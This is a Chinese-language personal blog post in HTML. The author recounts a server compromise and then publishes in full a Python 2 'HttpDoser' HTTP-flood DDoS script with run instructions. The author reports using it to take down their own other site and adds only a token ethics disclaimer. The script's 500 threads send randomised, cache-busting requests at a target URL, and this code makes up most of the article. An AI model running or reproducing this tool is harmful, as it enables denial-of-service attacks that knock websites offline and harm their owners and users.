<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh_CH">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#333">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#333">





  <meta name="keywords" content="网络,树莓派,Linux," />










<meta name="description" content="Interesting！网站在我没有完善安全措施的时候就有黑客入侵本网站且改了密码。并且利用本主机对其他网站进行了DDOS 攻击，实在是太有趣了。 现在公开一下黑客使用代码的参数，这个代码执行了之后可以对网站进行DDOS攻击。我的另外一个网站rednik.pw， 处于我的好奇，使用了这一个脚本文件，使用完毕之后发现网站打不开了，是在是太有趣了。">
<meta name="keywords" content="网络,树莓派,Linux">
<meta property="og:type" content="article">
<meta property="og:title" content="HttpDoser Python 文件下载">
<meta property="og:url" content="https://tonyxiahua.github.io/2016/11/26/HttpDoser-Python-文件下载/index.html">
<meta property="og:site_name" content="Xia Hua&#39;s Tech Blog">
<meta property="og:description" content="Interesting！网站在我没有完善安全措施的时候就有黑客入侵本网站且改了密码。并且利用本主机对其他网站进行了DDOS 攻击，实在是太有趣了。 现在公开一下黑客使用代码的参数，这个代码执行了之后可以对网站进行DDOS攻击。我的另外一个网站rednik.pw， 处于我的好奇，使用了这一个脚本文件，使用完毕之后发现网站打不开了，是在是太有趣了。">
<meta property="og:locale" content="zh_CH">
<meta property="og:updated_time" content="2018-08-07T21:02:43.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HttpDoser Python 文件下载">
<meta name="twitter:description" content="Interesting！网站在我没有完善安全措施的时候就有黑客入侵本网站且改了密码。并且利用本主机对其他网站进行了DDOS 攻击，实在是太有趣了。 现在公开一下黑客使用代码的参数，这个代码执行了之后可以对网站进行DDOS攻击。我的另外一个网站rednik.pw， 处于我的好奇，使用了这一个脚本文件，使用完毕之后发现网站打不开了，是在是太有趣了。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":true,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://tonyxiahua.github.io/2016/11/26/HttpDoser-Python-文件下载/"/>





  <title>HttpDoser Python 文件下载 | Xia Hua's Tech Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh_CH">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Xia Hua's Tech Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">Elohim, Essaim.   Elohim, Essaim.  I implore you</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            Commonweal 404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://tonyxiahua.github.io/2016/11/26/HttpDoser-Python-文件下载/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xia Hua">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/icon.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Xia Hua's Tech Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">HttpDoser Python 文件下载</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2016-11-26T11:04:56-08:00">
                2016-11-26
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2016/11/26/HttpDoser-Python-文件下载/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2016/11/26/HttpDoser-Python-文件下载/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="Interesting！"><a href="#Interesting！" class="headerlink" title="Interesting！"></a>Interesting！</h3><p>网站在我没有完善安全措施的时候就有黑客入侵本网站且改了密码。并且利用本主机对其他网站进行了DDOS 攻击，实在是太有趣了。</p>
<p>现在公开一下黑客使用代码的参数，这个代码执行了之后可以对网站进行DDOS攻击。我的另外一个网站rednik.pw， 处于我的好奇，使用了这一个脚本文件，使用完毕之后发现网站打不开了，是在是太有趣了。<br><a id="more"></a><br>参数：<br>python HttpDoser.py XXXXXXXXXXXXXX   －XXXXXXXXXXXXX意为攻击的网站。</p>
<h3 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib2</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="comment">#global params</span></span><br><span class="line">url=<span class="string">''</span></span><br><span class="line">host=<span class="string">''</span></span><br><span class="line">headers_useragents=[]</span><br><span class="line">headers_referers=[]</span><br><span class="line">request_counter=<span class="number">0</span></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line">safe=<span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">inc_counter</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">global</span> request_counter</span><br><span class="line">	request_counter+=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_flag</span><span class="params">(val)</span>:</span></span><br><span class="line">	<span class="keyword">global</span> flag</span><br><span class="line">	flag=val</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_safe</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">global</span> safe</span><br><span class="line">	safe=<span class="number">1</span></span><br><span class="line">	</span><br><span class="line"><span class="comment"># generates a user agent array</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">useragent_list</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">global</span> headers_useragents</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)'</span>)</span><br><span class="line">	headers_useragents.append(<span class="string">'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'</span>)</span><br><span class="line">	<span class="keyword">return</span>(headers_useragents)</span><br><span class="line"></span><br><span class="line"><span class="comment"># generates a referer array</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">referer_list</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">global</span> headers_referers</span><br><span class="line">	headers_referers.append(<span class="string">'http://www.google.com/?q='</span>)</span><br><span class="line">	headers_referers.append(<span class="string">'http://www.usatoday.com/search/results?q='</span>)</span><br><span class="line">	headers_referers.append(<span class="string">'http://engadget.search.aol.com/search?q='</span>)</span><br><span class="line">	headers_referers.append(<span class="string">'http://'</span> + host + <span class="string">'/'</span>)</span><br><span class="line">	<span class="keyword">return</span>(headers_referers)</span><br><span class="line">	</span><br><span class="line"><span class="comment">#builds random ascii string</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">buildblock</span><span class="params">(size)</span>:</span></span><br><span class="line">	out_str = <span class="string">''</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, size):</span><br><span class="line">		a = random.randint(<span class="number">65</span>, <span class="number">90</span>)</span><br><span class="line">		out_str += chr(a)</span><br><span class="line">	<span class="keyword">return</span>(out_str)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">usage</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">'---------------------------------------------------'</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">'USAGE: python httpdoser.py &lt;url&gt;'</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">'httpdoser website : DDoS Attack'</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">"\a"</span></span><br><span class="line"><span class="keyword">print</span> \</span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">                   ...</span></span><br><span class="line"><span class="string">                 ;::::;   Http_Doser Starting...</span></span><br><span class="line"><span class="string">               ;::::; :;    By DDoS Attack</span></span><br><span class="line"><span class="string">             ;:::::'   :;</span></span><br><span class="line"><span class="string">            ;:::::;     ;.</span></span><br><span class="line"><span class="string">           ,:::::'       ;           OOO\</span></span><br><span class="line"><span class="string">           ::::::;       ;          OOOOO\</span></span><br><span class="line"><span class="string">           ;:::::;       ;         OOOOOOOO</span></span><br><span class="line"><span class="string">          ,;::::::;     ;'         / OOOOOOO</span></span><br><span class="line"><span class="string">        ;:::::::::`. ,,,;.        /  / DOOOOOO</span></span><br><span class="line"><span class="string">      .';:::::::::::::::::;,     /  /     DOOOO</span></span><br><span class="line"><span class="string">     ,::::::;::::::;;;;::::;,   /  /        DOOO</span></span><br><span class="line"><span class="string">    ;`::::::`'::::::;;;::::: ,#/  /          DOOO</span></span><br><span class="line"><span class="string">    :`:::::::`;::::::;;::: ;::#  /            DOOO</span></span><br><span class="line"><span class="string">    ::`:::::::`;:::::::: ;::::# /              DOO</span></span><br><span class="line"><span class="string">    `:`:::::::`;:::::: ;::::::#/               DOO</span></span><br><span class="line"><span class="string">     :::`:::::::`;; ;:::::::::##                OO</span></span><br><span class="line"><span class="string">     ::::`:::::::`;::::::::;:::#                OO</span></span><br><span class="line"><span class="string">     `:::::`::::::::::::;'`:;::#                O</span></span><br><span class="line"><span class="string">      `:::::`::::::::;' /  / `:#</span></span><br><span class="line"><span class="string">       ::::::`:::::;'  /  /   `#</span></span><br><span class="line"><span class="string">                                          </span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'---------------------------------------------------'</span></span><br><span class="line"></span><br><span class="line">	</span><br><span class="line"><span class="comment">#http request</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">httpcall</span><span class="params">(url)</span>:</span></span><br><span class="line">	useragent_list()</span><br><span class="line">	referer_list()</span><br><span class="line">	code=<span class="number">0</span></span><br><span class="line">	<span class="keyword">if</span> url.count(<span class="string">"?"</span>)&gt;<span class="number">0</span>:</span><br><span class="line">		param_joiner=<span class="string">"&amp;"</span></span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		param_joiner=<span class="string">"?"</span></span><br><span class="line">	request = urllib2.Request(url + param_joiner + buildblock(random.randint(<span class="number">3</span>,<span class="number">10</span>)) + <span class="string">'='</span> + buildblock(random.randint(<span class="number">3</span>,<span class="number">10</span>)))</span><br><span class="line">	request.add_header(<span class="string">'User-Agent'</span>, random.choice(headers_useragents))</span><br><span class="line">	request.add_header(<span class="string">'Cache-Control'</span>, <span class="string">'no-cache'</span>)</span><br><span class="line">	request.add_header(<span class="string">'Accept-Charset'</span>, <span class="string">'ISO-8859-1,utf-8;q=0.7,*;q=0.7'</span>)</span><br><span class="line">	request.add_header(<span class="string">'Referer'</span>, random.choice(headers_referers) + buildblock(random.randint(<span class="number">5</span>,<span class="number">10</span>)))</span><br><span class="line">	request.add_header(<span class="string">'Keep-Alive'</span>, random.randint(<span class="number">110</span>,<span class="number">120</span>))</span><br><span class="line">	request.add_header(<span class="string">'Connection'</span>, <span class="string">'keep-alive'</span>)</span><br><span class="line">	request.add_header(<span class="string">'Host'</span>,host)</span><br><span class="line">	<span class="keyword">try</span>:</span><br><span class="line">			urllib2.urlopen(request)</span><br><span class="line">	<span class="keyword">except</span> urllib2.HTTPError, e:</span><br><span class="line">			<span class="comment">#print e.code</span></span><br><span class="line">			set_flag(<span class="number">1</span>)</span><br><span class="line"> 			<span class="keyword">print</span> <span class="string">'Flooding WebSite Port 80 with 65000-byte packets for 99999'</span></span><br><span class="line">			code=<span class="number">500</span></span><br><span class="line">	<span class="keyword">except</span> urllib2.URLError, e:</span><br><span class="line">			<span class="comment">#print e.reason</span></span><br><span class="line">			sys.exit()</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">			inc_counter()</span><br><span class="line">			urllib2.urlopen(request)</span><br><span class="line">	<span class="keyword">return</span>(code)		</span><br><span class="line"></span><br><span class="line">	</span><br><span class="line"><span class="comment">#http caller thread </span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">HTTPThread</span><span class="params">(threading.Thread)</span>:</span></span><br><span class="line">	<span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self)</span>:</span></span><br><span class="line">		<span class="keyword">try</span>:</span><br><span class="line">			<span class="keyword">while</span> flag&lt;<span class="number">2</span>:</span><br><span class="line">				code=httpcall(url)</span><br><span class="line">				<span class="keyword">if</span> (code==<span class="number">500</span>) &amp; (safe==<span class="number">1</span>):</span><br><span class="line">					set_flag(<span class="number">2</span>)</span><br><span class="line">		<span class="keyword">except</span> Exception, ex:</span><br><span class="line">			<span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># monitors http threads and counts requests</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MonitorThread</span><span class="params">(threading.Thread)</span>:</span></span><br><span class="line">	<span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self)</span>:</span></span><br><span class="line">		previous=request_counter</span><br><span class="line">		<span class="keyword">while</span> flag==<span class="number">0</span>:</span><br><span class="line">			<span class="keyword">if</span> (previous+<span class="number">100</span>&lt;request_counter) &amp; (previous&lt;&gt;request_counter):</span><br><span class="line">				<span class="keyword">print</span> <span class="string">"%d Shots sends Senting"</span> % (request_counter)</span><br><span class="line">				previous=request_counter</span><br><span class="line">		<span class="keyword">if</span> flag==<span class="number">2</span>:</span><br><span class="line">			<span class="keyword">print</span> <span class="string">"\n -M60 Hits are secced"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#execute </span></span><br><span class="line"><span class="keyword">if</span> len(sys.argv) &lt; <span class="number">2</span>:</span><br><span class="line">	usage()</span><br><span class="line">	sys.exit()</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	<span class="keyword">if</span> sys.argv[<span class="number">1</span>]==<span class="string">"help"</span>:</span><br><span class="line">		usage()</span><br><span class="line">		sys.exit()</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"Flooding WebSite Port 80 with 65000-byte packets for 99999 By DDoS Attack"</span></span><br><span class="line">		<span class="keyword">if</span> len(sys.argv)== <span class="number">3</span>:</span><br><span class="line">			<span class="keyword">if</span> sys.argv[<span class="number">2</span>]==<span class="string">"safe"</span>:</span><br><span class="line">				set_safe()</span><br><span class="line">		url = sys.argv[<span class="number">1</span>]</span><br><span class="line">		<span class="keyword">if</span> url.count(<span class="string">"/"</span>)==<span class="number">2</span>:</span><br><span class="line">			url = url + <span class="string">"/"</span></span><br><span class="line">		m = re.search(<span class="string">'http\://([^/]*)/?.*'</span>, url)</span><br><span class="line">		host = m.group(<span class="number">1</span>)</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">500</span>):</span><br><span class="line">			t = HTTPThread()</span><br><span class="line">			t.start()</span><br><span class="line">		t = MonitorThread()</span><br><span class="line">		t.start()</span><br></pre></td></tr></table></figure>
<h3 id="事后"><a href="#事后" class="headerlink" title="事后"></a>事后</h3><p>当然，攻击他人电脑的行为是真的不道德，建议大家还是合理使用这段代码，说回被肉鸡，其实有很大的一部分原因是因为自己使用了弱口令，最近改了新密码，以后可能会会换成AWS的那种密匙登录，这样就万无一失了。</p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>Donate comment here</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatimg.jpg" alt="Xia Hua WeChat Pay"/>
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipayimg.jpg" alt="Xia Hua Alipay"/>
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    Xia Hua
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="https://tonyxiahua.github.io/2016/11/26/HttpDoser-Python-文件下载/" title="HttpDoser Python 文件下载">https://tonyxiahua.github.io/2016/11/26/HttpDoser-Python-文件下载/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/网络/" rel="tag"># 网络</a>
          
            <a href="/tags/树莓派/" rel="tag"># 树莓派</a>
          
            <a href="/tags/Linux/" rel="tag"># Linux</a>
          
        </div>
      

      
      
        <div class="post-widgets">
        

        

        
          
          <div id="needsharebutton-postbottom">
            <span class="btn">
              <i class="fa fa-share-alt" aria-hidden="true"></i>
            </span>
          </div>
        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/11/22/Hexo-With-Cyberduck-Blog-Post/" rel="next" title="Hexo With Cyberduck Blog Post">
                <i class="fa fa-chevron-left"></i> Hexo With Cyberduck Blog Post
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/11/30/Audi-B6-A4-DIY-教程网站/" rel="prev" title="Audi B6 A4 DIY 教程网站">
                Audi B6 A4 DIY 教程网站 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/icon.jpg"
                alt="Xia Hua" />
            
              <p class="site-author-name" itemprop="name">Xia Hua</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">39</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">48</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/tonyxiahua" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:contact@tonyxiahua.github.io" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.google.com" target="_blank" title="Google">
                      
                        <i class="fa fa-fw fa-google"></i>Google</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/rednik111" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
            </div>
          

          
          
